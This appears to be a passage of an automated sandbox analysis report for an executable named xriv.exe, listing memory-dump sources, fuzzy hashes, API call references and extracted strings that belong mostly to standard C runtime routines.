                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 57efc23b4e29317a9de391637d0cd73011edad85a1f89b8c1fc195e1451e8222
                                                          • Instruction ID: 0017fb8887b384d0196ce160c825324003e00269b15928a80f556730cd749a69
                                                          • Opcode Fuzzy Hash: 57efc23b4e29317a9de391637d0cd73011edad85a1f89b8c1fc195e1451e8222
                                                          • Instruction Fuzzy Hash: E4C1F171E04649EFEF16DF99C880BAEBBB2AF59314F144059E505AB392C7309A81CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$___from_strstr_to_strchr
                                                          • String ID:
                                                          • API String ID: 3409252457-0
                                                          • Opcode ID: 3ee45ce07e56e285b40f6bb273311f8633759f17d448ff5808568e08beb269d8
                                                          • Instruction ID: 2c058718565253f54cae0acf16be6f78512b382cd8048863e5b6db4fda028476
                                                          • Opcode Fuzzy Hash: 3ee45ce07e56e285b40f6bb273311f8633759f17d448ff5808568e08beb269d8
                                                          • Instruction Fuzzy Hash: 7F514870D44345AFDF22BFB89881A6D7BF4EF09714F1042AEF91597281EB319A80CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 001885A7
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 001885AF
                                                          • _ValidateLocalCookies.LIBCMT ref: 00188638
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00188663
                                                          • _ValidateLocalCookies.LIBCMT ref: 001886B8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 1170836740-1018135373
                                                          • Opcode ID: b85e8a3e806bb793cc8a4ac79f178dd93a669427a8b53a46c27ee7763ca83814
                                                          • Instruction ID: b54929deed32a03bf7ded0de3e8fcee083f649701bac28419416819c0c35aa71
                                                          • Opcode Fuzzy Hash: b85e8a3e806bb793cc8a4ac79f178dd93a669427a8b53a46c27ee7763ca83814
                                                          • Instruction Fuzzy Hash: A441D734A00218EBCF10FF68C884AAEBBB5EF55324F648155E8159B392EB31DB05CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 0-537541572
                                                          • Opcode ID: 0b06f1b08ddedca378ce9d62fea00c6da14a9d683ac98b172f0afeaabfc31062
                                                          • Instruction ID: 1aa24f85ebbaff58359312b74408551674b74af23792a0fcbcbd721f094fe11d
                                                          • Opcode Fuzzy Hash: 0b06f1b08ddedca378ce9d62fea00c6da14a9d683ac98b172f0afeaabfc31062
                                                          • Instruction Fuzzy Hash: 0121E772A41220BBEB35AB68DC45A5E37DE9F557A0F250225FD06A7690D730EF008FE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00191405: _free.LIBCMT ref: 0019142A
                                                          • _free.LIBCMT ref: 0019148B
                                                            • Part of subcall function 0018D653: HeapFree.KERNEL32(00000000,00000000,?,0019142F,?,00000000,?,?,?,00191456,?,00000007,?,?,00191858,?), ref: 0018D669
                                                            • Part of subcall function 0018D653: GetLastError.KERNEL32(?,?,0019142F,?,00000000,?,?,?,00191456,?,00000007,?,?,00191858,?,?), ref: 0018D67B
                                                          • _free.LIBCMT ref: 00191496
                                                          • _free.LIBCMT ref: 001914A1
                                                          • _free.LIBCMT ref: 001914F5
                                                          • _free.LIBCMT ref: 00191500
                                                          • _free.LIBCMT ref: 0019150B
                                                          • _free.LIBCMT ref: 00191516
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 745ba4c7df38b0c8b3501d58b22aa89868de86b005191e755d783c3d27d16807
                                                          • Instruction ID: c49994700b5adf867bde0ffc77d996a7c6704759e52649efabf60b92dd350af0
                                                          • Opcode Fuzzy Hash: 745ba4c7df38b0c8b3501d58b22aa89868de86b005191e755d783c3d27d16807
                                                          • Instruction Fuzzy Hash: 45118472540709B6DB20BFB1DC07FCB77AC9F14701F414815B29DAB092E728B685CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetConsoleCP.KERNEL32(?,00175140,00000000), ref: 00192B40
                                                          • __fassign.LIBCMT ref: 00192D1F
                                                          • __fassign.LIBCMT ref: 00192D3C
                                                          • WriteFile.KERNEL32(?,00175140,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00192D84
                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00192DC4
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00192E70
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ConsoleErrorLast
                                                          • String ID:
                                                          • API String ID: 4031098158-0
                                                          • Opcode ID: 957392c89d5abce464096c0d1765a1c8d4e231d0522405a1dbfd59374b4e7f6a
                                                          • Instruction ID: 712793390fb2478fa1fc80df1ea39aa72efccfddc89344b2016c28490bb1a37f
                                                          • Opcode Fuzzy Hash: 957392c89d5abce464096c0d1765a1c8d4e231d0522405a1dbfd59374b4e7f6a
                                                          • Instruction Fuzzy Hash: 56D16A75D00258AFCF15CFA8C8809EDBBB5BF49314F28416AE856BB252D731AE46CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,00188887,00188476,00187AC4), ref: 0018889E
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001888AC
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001888C5
                                                          • SetLastError.KERNEL32(00000000,00188887,00188476,00187AC4), ref: 00188917
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: abb7cc7b063b5d7207de943353a356ad4da009fdf729c73ed519e1b19a97227f
                                                          • Instruction ID: b290cc6e1cc0bc4f6a6e7a2de8f3ac274c004a37e06f484062357b9a9e56d6dc
                                                          • Opcode Fuzzy Hash: abb7cc7b063b5d7207de943353a356ad4da009fdf729c73ed519e1b19a97227f
                                                          • Instruction Fuzzy Hash: 7201F732A1A7115FA7293B74AC85A3B2794EF527F4760022AF520428E1EF214E445F81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, xrefs: 00190033
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                          • API String ID: 0-4106172500
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _wcsrchr
                                                          • String ID: .bat$.cmd$.com$.exe
                                                          • API String ID: 1752292252-4019086052
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: api-ms-
                                                          • API String ID: 0-2084034818
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0018A9D8,0018E000,?,0018A9A0,0018AF26,?,0018E000), ref: 0018A9F8
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0018AA0B
                                                          • FreeLibrary.KERNEL32(00000000,?,?,0018A9D8,0018E000,?,0018A9A0,0018AF26,?,0018E000), ref: 0018AA2E
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCPInfo.KERNEL32(0101F658,0101F658,?,7FFFFFFF,?,?,00196325,0101F658,0101F658,?,0101F658,?,?,?,?,0101F658), ref: 0019610C
                                                          • __alloca_probe_16.LIBCMT ref: 001961C2
                                                          • __alloca_probe_16.LIBCMT ref: 00196258
                                                          • __freea.LIBCMT ref: 001962C3
                                                          • __freea.LIBCMT ref: 001962CF
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __alloca_probe_16__freea$Info
                                                          • String ID:
                                                          • API String ID: 2330168043-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __alloca_probe_16.LIBCMT ref: 00194A18
                                                          • __alloca_probe_16.LIBCMT ref: 00194ADE
                                                          • __freea.LIBCMT ref: 00194B4A
                                                            • Part of subcall function 0018DB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,00188272,?,?,?,?,?,001720C3,?,?), ref: 0018DB6E
                                                          • __freea.LIBCMT ref: 00194B53
                                                          • __freea.LIBCMT ref: 00194B76
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1423051803-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0018B0E0), ref: 0018B1D0
                                                          • GetFileInformationByHandle.KERNEL32(?,?), ref: 0018B22A
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0018B0E0,?,000000FF,00000000,00000000), ref: 0018B2B8
                                                          • __dosmaperr.LIBCMT ref: 0018B2BF
                                                          • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0018B2FC
                                                            • Part of subcall function 0018B524: __dosmaperr.LIBCMT ref: 0018B559
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                          • String ID:
                                                          • API String ID: 1206951868-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 001913B4
                                                            • Part of subcall function 0018D653: HeapFree.KERNEL32(00000000,00000000,?,0019142F,?,00000000,?,?,?,00191456,?,00000007,?,?,00191858,?), ref: 0018D669
                                                            • Part of subcall function 0018D653: GetLastError.KERNEL32(?,?,0019142F,?,00000000,?,?,?,00191456,?,00000007,?,?,00191858,?,?), ref: 0018D67B
                                                          • _free.LIBCMT ref: 001913C6
                                                          • _free.LIBCMT ref: 001913D8
                                                          • _free.LIBCMT ref: 001913EA
                                                          • _free.LIBCMT ref: 001913FC
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID: *?
                                                          • API String ID: 269201875-2564092906
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AdjustPointer
                                                          • String ID:
                                                          • API String ID: 1740715915-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetVersionExW.KERNEL32(0000011C,?,5D32641E,00000000), ref: 00174D89
                                                          • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00174DF0
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00174DF7
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProcVersion
                                                          • String ID:
                                                          • API String ID: 3310240892-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 0019509E
                                                          • _free.LIBCMT ref: 001950C7
                                                          • SetEndOfFile.KERNEL32(00000000,001925FD,00000000,0018D4F0,?,?,?,?,?,?,?,001925FD,0018D4F0,00000000), ref: 001950F9
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,001925FD,0018D4F0,00000000,?,?,?,?,00000000), ref: 00195115
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFileLast
                                                          • String ID:
                                                          • API String ID: 1547350101-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0018AE0F: _free.LIBCMT ref: 0018AE1D
                                                            • Part of subcall function 00190971: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00194B40,?,00000000,00000000), ref: 00190A13
                                                          • GetLastError.KERNEL32 ref: 0018FA02
                                                          • __dosmaperr.LIBCMT ref: 0018FA09
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0018FA48
                                                          • __dosmaperr.LIBCMT ref: 0018FA4F
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                          • String ID:
                                                          • API String ID: 167067550-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLastError.KERNEL32(?,00000000,?,0018AD8D,00000000,?,?,?,0018AF26,?), ref: 0018DF49
                                                          • _free.LIBCMT ref: 0018DFA6
                                                          • _free.LIBCMT ref: 0018DFDC
                                                          • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,0018AF26,?), ref: 0018DFE7
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast_free
                                                          • String ID:
                                                          • API String ID: 2283115069-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,0018B7F5,0018DB7F,?,?,00188272,?,?,?,?,?,001720C3,?,?), ref: 0018E0A0
                                                          • _free.LIBCMT ref: 0018E0FD
                                                          • _free.LIBCMT ref: 0018E133
                                                          • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00188272,?,?,?,?,?,001720C3,?,?), ref: 0018E13E
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast_free
                                                          • String ID:
                                                          • API String ID: 2283115069-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0018E9E2,00000000,?,0019370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0018E893
                                                          • GetLastError.KERNEL32(?,0019370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0018E9E2,00000000,00000104,?), ref: 0018E89D
                                                          • __dosmaperr.LIBCMT ref: 0018E8A4
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorFullLastNamePath__dosmaperr
                                                          • String ID:
                                                          • API String ID: 2398240785-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0018E9E2,00000000,?,00193695,00000000,00000000,0018E9E2,?,?,00000000,00000000,00000001), ref: 0018E8FC
                                                          • GetLastError.KERNEL32(?,00193695,00000000,00000000,0018E9E2,?,?,00000000,00000000,00000001,00000000,00000000,?,0018E9E2,00000000,00000104), ref: 0018E906
                                                          • __dosmaperr.LIBCMT ref: 0018E90D
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorFullLastNamePath__dosmaperr
                                                          • String ID:
                                                          • API String ID: 2398240785-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • WriteConsoleW.KERNEL32(00175140,0000000F,001A68F8,00000000,00175140,?,00195AA7,00175140,00000001,00175140,00175140,?,00192ECD,00000000,?,00175140), ref: 001963A6
                                                          • GetLastError.KERNEL32(?,00195AA7,00175140,00000001,00175140,00175140,?,00192ECD,00000000,?,00175140,00000000,00175140,?,00193421,00175140), ref: 001963B2
                                                            • Part of subcall function 00196378: CloseHandle.KERNEL32(FFFFFFFE,001963C2,?,00195AA7,00175140,00000001,00175140,00175140,?,00192ECD,00000000,?,00175140,00000000,00175140), ref: 00196388
                                                          • ___initconout.LIBCMT ref: 001963C2
                                                            • Part of subcall function 0019633A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00196369,00195A94,00175140,?,00192ECD,00000000,?,00175140,00000000), ref: 0019634D
                                                          • WriteConsoleW.KERNEL32(00175140,0000000F,001A68F8,00000000,?,00195AA7,00175140,00000001,00175140,00175140,?,00192ECD,00000000,?,00175140,00000000), ref: 001963D7
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                          • String ID:
                                                          • API String ID: 2744216297-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SleepConditionVariableCS.KERNELBASE(?,00187157,00000064), ref: 001871DD
                                                          • LeaveCriticalSection.KERNEL32(001A9708,000000FF,?,00187157,00000064,?,?,?,00173E30,001AC468,5D32641E,?,00000000,00198818,000000FF), ref: 001871E7
                                                          • WaitForSingleObjectEx.KERNEL32(000000FF,00000000,?,00187157,00000064,?,?,?,00173E30,001AC468,5D32641E,?,00000000,00198818,000000FF), ref: 001871F8
                                                          • EnterCriticalSection.KERNEL32(001A9708,?,00187157,00000064,?,?,?,00173E30,001AC468,5D32641E,?,00000000,00198818,000000FF), ref: 001871FF
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                          • String ID:
                                                          • API String ID: 3269011525-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 0018C8C4
                                                            • Part of subcall function 0018D653: HeapFree.KERNEL32(00000000,00000000,?,0019142F,?,00000000,?,?,?,00191456,?,00000007,?,?,00191858,?), ref: 0018D669
                                                            • Part of subcall function 0018D653: GetLastError.KERNEL32(?,?,0019142F,?,00000000,?,?,?,00191456,?,00000007,?,?,00191858,?,?), ref: 0018D67B
                                                          • _free.LIBCMT ref: 0018C8D7
                                                          • _free.LIBCMT ref: 0018C8E8
                                                          • _free.LIBCMT ref: 0018C8F9
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: -
                                                          • API String ID: 0-2547889144
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                          • API String ID: 0-4106172500
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00188FA2
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EncodePointer
                                                          • String ID: MOC$RCC
                                                          • API String ID: 2118026453-2084237596
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00182093
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileModuleName
                                                          • String ID: 5120$H
                                                          • API String ID: 514040917-2391956277
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%